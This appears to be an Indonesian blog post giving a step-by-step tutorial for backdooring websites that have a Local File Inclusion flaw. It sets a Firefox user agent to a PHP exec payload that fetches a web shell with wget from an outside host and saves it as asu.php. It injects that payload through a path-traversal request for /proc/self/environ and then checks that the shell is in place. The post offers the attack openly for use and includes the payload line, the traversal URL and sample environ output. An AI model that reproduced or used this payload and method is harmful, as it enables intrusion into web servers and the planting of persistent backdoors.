kali ini akan saya tuliskan cara backdoring LFI yang sederhana lewan addon mozilla ( tamper )
yang start secara otomatis pada mozila
perlengkapan:
1. addon mozila "https://addons.mozilla.org/pt-BR/firefox/addon/59"
2. asumsi harus menggunakan firefox / mozilla
3. target LFI
4. injektor ( c99 / r57 / dan yang lainnya )
5. kopi + rokok hahaahah
download addon mozila tersebut dan pasang atau instal di mozilla kalian
untuk mengaktifkan addon tersebut kalian harus seting mozilla dengan pllihan sebagai berikut:
1. pilih menu alat + default user agent + edit user agent
2 buat baru user agent
3. disini kalian hanya perlu mengganti code script pada user agent, kodenya seperti berikut:
-----------------------------------------------------------------------------------------------
Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9) Gecko/2008052906 Firefox/3.0
-----------------------------------------------------------------------------------------------
dan kalian ganti seperti berikut:
--------------------------------------------------------------------------------------
< ? exec ('wget http://kcbschicago.com/bbs/fx.txt -O asu.php');?> ---------------------------------------------------------------------------------------
dan descripsi kalian isi misal saja LFI lalu tekan ok
4. untuk selanjutnya kembali menu alat dan kalian pilih default user agent + LFI
untuk menjalankan addon tersebut
5. cek menu bantuan pada mozilla dan pilih tentang mozila untuk melihat addon sudah terpasang apa belum
jika sudah terpasang akan di tampilkan code script yang kalian pasang tadi...
6. pemasangan addon mozila selesai...
http://www.site.com/index.php?page=../../../../../../../../../../../../../../../proc/self/environ
misalnya kalian dapat vuln target lfi seperti di atas
dengan ketentuan membaca /proc/self/environ untuk dapat di acces
------------------------------------------------------------------------------------------------
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin
-------------------------------------------------------------------------------------------------------------------------------
untuk meng uplod backdor kalian cukup mudah langsug saja kalian browse di mozila vuln lfi bugs tersebut
Command code akan men-download file injektor kalian secara otomatis
check bakcdor kalian
-------------------------------
http://www.site.com/asu.php
-------------------------------
dan akhirnya mendapatkannya
No comments:
Post a Comment